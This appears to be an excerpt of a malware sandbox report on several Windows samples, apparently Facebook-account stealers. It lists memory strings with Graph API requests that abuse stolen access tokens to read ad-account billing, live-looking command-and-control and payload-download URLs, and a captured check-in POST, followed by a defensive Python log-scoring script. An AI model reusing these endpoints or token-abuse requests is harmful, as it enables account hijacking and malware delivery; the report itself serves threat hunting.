      Source: yevbZfdCqR.exe, 00000001.00000003.657101676.0000000005E51000.00000004.00000001.sdmpString found in binary or memory: 87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_htt
p_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/AKfycbyeDUociDSMjODhy_ZapM5zzyoJ3zrch9n5IUJeKIM3UQOEtZs/exec?loc=location&app=Staoism&payoutcents=0.08&ver=3.5&ip=iplocation7https://maper.info/X1qpthttp
      Source: jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: 9invalid stof argumentstof argument out of rangemap/set too longMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22viewab
le_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/A
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmpString found in binary or memory: @invalid stof argumentstof argument out of rangemap/set too longMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60http://ip-api.com/json/countryCodecountry_codeofen_placemac10isinstallisLogined33uidversionc_userjazoest=/login/device-based/login/"=""jazoest""lsd""uid""source"&lsd=&uid=&source=&next=https://www.facebook.com/login/device-based/login/cookieJsonhttps://www.facebook.com/ads/manager/account_settings/account_billingaccess_token:{accountID:{_/v9.0/actpayInfoaccountIdhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_index=5&_reqName=adaccount&_reqSrc=AdsCMPaymentsAccountDataDispatcher&fields=%5B%22active_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22can_pay_now%22%2C%22can_repay_now%22%2C%22current_unbilled_spend%22%2C%22extended_credit_info%22%2C%22is_br_entity_account%22%2C%22has_extended_credit%22%2C%22max_billing_threshold%22%2C%22min_billing_threshold%22%2C%22min_payment%22%2C%22next_bill_date%22%2C%22pending_billing_date_preference%7Bday_of_month%2Cid%2Cnext_bill_date%2Ctime_created%2Ctime_effective%7D%22%2C%22promotion_progress_bar_info%22%2C%22show_improved_boleto%22%2C%22business%7Bid%2Cname%2Cpayment_account_id%7D%22%2C%22total_prepay_balance%22%2C%22is_in_middle_of_local_entity_migration%22%2C%22is_in_3ds_authorization_enabled_market%22%2C%22current_unpaid_unrepaid_invoice%22%2C%22has_repay_processing_invoices%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1un_pwdfb_uidfb_access_tokencan_pay_nowhttps://graph.facebook.com/v9.0/me/adaccounts?access_token=fb_access_token&_reqName=me%2Fadaccounts&_reqSrc=AdsTypeaheadDataManager&fields=%5B%22account_id%22%2C%22account_status%22%2C%22is_direct_deals_enabled%22%2C%22business%7Bid%2Cname%7D%22%2C%22v
iewable_business%7Bid%2Cname%7D%22%2C%22name%22%5D&filtering=%5B%5D&include_headers=false&limit=100&method=get&pretty=0&sort=name_ascending&suppress_http_code=1"business"businessdataaccount_ididhttps://business.facebook.com/ads/manager/account_settings/account_billing/?act=fb_account_id&pid=p1&business_id=fb_business_id&page=account_settings&tab=account_billing_settingsfb_account_idfb_business_idhttps://graph.facebook.com/v9.0/act_fb_uid?access_token=fb_access_token&_priority=HIGH&_reqName=adaccount&_reqSrc=AdsCMAccountSpendLimitDataLoader&fields=%5B%22spend_cap%22%2C%22amount_spent%22%5D&include_headers=false&method=get&pretty=0&suppress_http_code=1amount_spent"show_admined_pages":truehasHomePageadtrustratiohttps://www.facebook.com/adsmanager/creation?act=fb_idfb_id,:"account_currency_ratio_to_usd":"adtrust_dsl":timeline_chromehttps://www.facebook.com/profile.php?id=c_user&sk=friendshref="<>"_gs6"}"items":{"count"friendsNumapi/fbtime{"sid":0,"time":0,"rand_str":""}api/?sid=sid#IO$J2&89DFJ2^984%7FJfj<>asi?h3.728*fhastimerand_str89%3gj,IH@<F7>84|j5kl3;4y:jdFJOhf01(92)3&key=statushttps://script.google.com/macros/s/A
      Source: jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmpString found in binary or memory: Unknown exceptionbad array new lengthstring too long: iostreambad castbad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setinvalid stoi argumentstoi argument out of rangeUseJu47egg whatppphatOjk4ehg riwjgHgegUse whatppphatN5Vb3euig riwjg^(([^:\/?#]+):)?(//([^\/?#:]*)(:([^\/?#]*))?)?([^?#]*)(\?([^#]*))?(#(.*))?MalformedHh6e4sgg urlStrYkeI3hBGgErrorJhg4eu (WinHttpOpenNm4eg)ErrorOj7g4he (WinHttpGetProxyForUrlTh7e4gh)Error (WinHttpGetProxyForUrl)httphttpsUnknownNsV6e4hg schemeBe7n4us ErrorBjhe4hg (WinHttpConnectLj6e3hgg)?ErrorS7je4hg (WinHttpOpenRequestP6je4hg)ErrorHf74ge7g (WinHttpSendRequestVe7j4gi)ErrorJh7b4egg (WinHttpSendRequestPke4jhg)ErrorKj7e4hg (WinHttpReceiveResponseCeheg34g)ErrorTjr57eh (WinHttpQueryDataAvailableAe7hj4g)ErrorUj7e4hg (WinHttpReadDataPjke4hg)ErrorGh7e4hg (WinHttpSetCredentialsHe7j4hg)ErrorPj7e4hg (WinHttpQueryHeadersYg8e5gg)ErrorJh7eg4g (WinHttpQueryAuthSchemesYe6hg4)POSTGETlogin/device-based/loginContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9viewport-width: 1920Sec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Referer: https://www.facebook.com/Origin: https://www.facebook.comSec-Fetch-Dest: documentUpgrade-Insecure-Requests: 1/adsmanager/creation?act=/ads/manager/account_settings/account_billingSec-Fetch-Site: noneAccept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1v9.0/act_Accept: */*Content-type: application/x-www-form-urlencodedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-sitemanager/account_settings/account_billingprimary_location/infoprofile.phppages/?category=your_pageshttps://www.facebook.com/error_selfError (WinHttpSetOption)Error 
(WinHttpAddRequestHeaders)vector too longinvalid string positionvector<bool> too longalnumalnumalphaalphablankblankcntrlcntrldddigitdigitgraphgraphlowerlowerprintprintpunctpunctspacespacessupperupperwwxdigitxdigit equals www.facebook.com (Facebook)
      Source: LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.1034493046.00000000017AC000.00000004.00000001.sdmpString found in binary or memory: _kr",1,"__markup_9f5fac15_0_0_Pq"],["__elem_a588f507_0_7_m9","u_0_o_IV",1,"__markup_9f5fac15_0_0_Pq"],["__elem_45d73b5d_0_2_to","u_0_p_ps",1,"__markup_9f5fac15_0_0_Pq"]],"require":[["ServiceWorkerLoginAndLogout","login",[],[]],["ScriptPath","set",[],["XIndexReduxController","a1f3c513",{"imp_id":"0uzjV8ug6tmR1aK09","ef_page":null,"uri":"https:\/\/www.facebook.com\/"}]],["UITinyViewportAction","init",[],[]],["ResetScrollOnUnload","init",["__elem_a588f507_0_0_58"],[{"__m":"__elem_a588f507_0_0_58"}]],["AccessibilityWebVirtualCursorClickLogger","init",["__elem_a588f507_0_0_58"],[[{"__m":"__elem_a588f507_0_0_58"}]]],["KeyboardActiv equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmp String found in binary or memory: a@OFDroid1FFDroiderhttps://www.facebook.comSoftware\ffdroiderall_accounts_table_account_id_celltext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3?act=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36www.facebook.comhttps://www.facebook.com/ads/manager/accounts?_fb_noscript=1 equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmp String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp String found in binary or memory: https://www.facebook.com/adsmanager/creation?act=fb_id equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmp String found in binary or memory: https://www.facebook.com/pages/?category=your_pages&ref=bookmarks equals www.facebook.com (Facebook)
      Source: yevbZfdCqR.exe, 00000001.00000003.654242726.0000000005DE1000.00000004.00000001.sdmp, LPBuRcBvc7urPUzoi5RqTFtn.exe, 0000000D.00000002.987178090.0000000000C53000.00000002.00020000.sdmp, jooyu.exe, 0000001A.00000002.965275698.00000000003F3000.00000002.00020000.sdmp String found in binary or memory: https://www.facebook.com/profile.php?id=c_user&sk=friends equals www.facebook.com (Facebook)
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: unknown DNS traffic detected: queries for: cdn.discordapp.com
Source: unknown HTTP traffic detected: POST /base/api/getData.php HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Content-Length: 133
Host: 136.144.41.152
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Date: Wed, 23 Jun 2021 20:22:15 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Type: text/html; charset=iso-8859-1
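The request above is the one check-in the sandbox captured: a POST to /base/api/getData.php on a bare IP (136.144.41.152), a form-urlencoded body, and a pinned Chrome/74 User-Agent that was already two years stale in June 2021. The server answered 404 at analysis time; that says nothing about whether the C2 is alive (gated or already moved on), so the request pattern, not the response, is what to hunt for. The following is an added example, not sandbox output: it scores web-proxy records against those indicators and only flags records that match at least two of them, so the User-Agent alone never pages anyone. The record layout and the sample records are constructed here; only the path, host and User-Agent values come from the report.

```python
"""Score web-proxy records against the C2 check-in recorded in the report:
POST /base/api/getData.php to a bare-IP host, form-urlencoded body and a
pinned Chrome/74 User-Agent.

Added example for this report, not sandbox output. The record layout and the
sample records are constructed; the path, host and UA come from the report."""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

C2_PATH = "/base/api/getData.php"
C2_HOSTS = {"136.144.41.152"}
C2_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
         "(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36")
PE_EXT = (".exe", ".dll")

# Constructed record layout (assumption): METHOD PATH HOST "USER-AGENT" CONTENT-TYPE
RECORD_RE = re.compile(
    r'^(?P<method>[A-Z]+) (?P<path>\S+) (?P<host>\S+) "(?P<ua>[^"]*)" (?P<ctype>\S+)$')


def parse_record(line: str) -> Optional[Dict[str, str]]:
    m = RECORD_RE.match(line.strip())
    return m.groupdict() if m else None


def is_bare_ip(host: str) -> bool:
    """True for an IPv4 literal with or without a :port, False for a hostname."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def indicators(req: Dict[str, str]) -> List[str]:
    """Return every indicator a request matches; an empty list means clean."""
    hits: List[str] = []
    if req["method"] == "POST" and req["path"] == C2_PATH:
        hits.append("c2-path")
    if req["host"] in C2_HOSTS:
        hits.append("known-c2-host")
    if req["ua"] == C2_UA:
        # A never-updated, pinned UA is a weak signal on its own, so it only
        # counts together with something else.
        hits.append("pinned-chrome74-ua")
    bare = is_bare_ip(req["host"])
    if bare and req["method"] == "POST" and req["ctype"] == "application/x-www-form-urlencoded":
        hits.append("form-post-to-bare-ip")
    if bare and req["method"] == "GET" and req["path"].lower().endswith(PE_EXT):
        hits.append("pe-download-from-bare-ip")
    return hits


def detect(lines: List[str], min_hits: int = 2) -> List[Tuple[int, List[str]]]:
    """(record index, indicators) for every record with at least min_hits hits."""
    flagged: List[Tuple[int, List[str]]] = []
    for i, line in enumerate(lines):
        req = parse_record(line)
        if req is None:
            continue
        hits = indicators(req)
        if len(hits) >= min_hits:
            flagged.append((i, hits))
    return flagged


# Constructed sample records (not from the sandbox pcap).
SAMPLE_LOG = [
    f'POST {C2_PATH} 136.144.41.152 "{C2_UA}" application/x-www-form-urlencoded',
    f'GET /WW/file1.exe 136.144.41.133 "{C2_UA}" -',
    'GET /ajax/libs/jquery/1.6.4/jquery.min.js ajax.googleapis.com '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
    'Chrome/91.0.4472.114 Safari/537.36" -',
    f'POST /contact.php www.example.net "{C2_UA}" application/x-www-form-urlencoded',
    "not a proxy record",
]

if __name__ == "__main__":
    for idx, hits in detect(SAMPLE_LOG):
        print(f"record {idx}: {', '.join(hits)}")
```

Records 0 and 1 fire (the check-in itself, and a PE fetched from a bare IP with the same UA); record 3 carries the UA only and stays below the threshold, which is the intended behaviour for a single weak indicator.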
      Source: md8_8eus.exe, 00000023.00000002.964257095.0000000000509000.00000004.00020000.sdmpString found in binary or memory: http://101.36.107.74/seemorebty/
      Source: md8_8eus.exe, 00000023.00000002.964153694.00000000004D9000.00000002.00020000.sdmpString found in binary or memory: http://111.90.14facebook
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/
      Source: yevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000003.646799232.000000000101D000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exe1
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.650721948.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file1.exeuments
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exe/
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exem
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file2.exep
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exeG
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file4.exehttp://136.144.41.133/WW/file5.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exe;
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file5.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exe#
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file6.exehttp://136.144.41.133/WW/file7.exe
      Source: yevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exe152/:
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000003.650285790.0000000004F72000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file7.exeumentsN13eHI1fs1RwfU6rt0L4y8dk.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exe152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.753085531.0000000004EC3000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file8.exeW
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, md8_8eus.exe, 00000023.00000003.921603743.0000000003EB8000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exe
      Source: yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exe152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749797806.0000000000FC4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/WW/file9.exeC:
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749686234.0000000000F76000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/server.txt
      Source: yevbZfdCqR.exe, 00000001.00000002.749565925.0000000000F3A000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.133/server.txtB
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/(
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/32
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/A
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/AS
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/KB
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/OS
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/S
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmp, yevbZfdCqR.exe, 00000001.00000002.749754909.0000000000FAE000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.749740895.0000000000FA5000.00000004.00000020.sdmp, yevbZfdCqR.exe, 00000001.00000002.754047862.0000000005E5A000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php0
      Source: yevbZfdCqR.exe, 00000001.00000002.749711924.0000000000F86000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php:
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.php=
      Source: yevbZfdCqR.exe, 00000001.00000002.753180127.0000000004F0D000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpF
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpM
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpeS
      Source: yevbZfdCqR.exe, 00000001.00000002.753518854.0000000005AE0000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpeoP
      Source: yevbZfdCqR.exe, 00000001.00000002.753235699.0000000004F4C000.00000004.00000001.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpf=
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpiq4
      Source: yevbZfdCqR.exe, 00000001.00000002.749815750.0000000000FE4000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phpq
      Source: yevbZfdCqR.exe, 00000001.00000002.749661485.0000000000F60000.00000004.00000020.sdmpString found in binary or memory: http://136.144.41.152/base/api/getData.phps
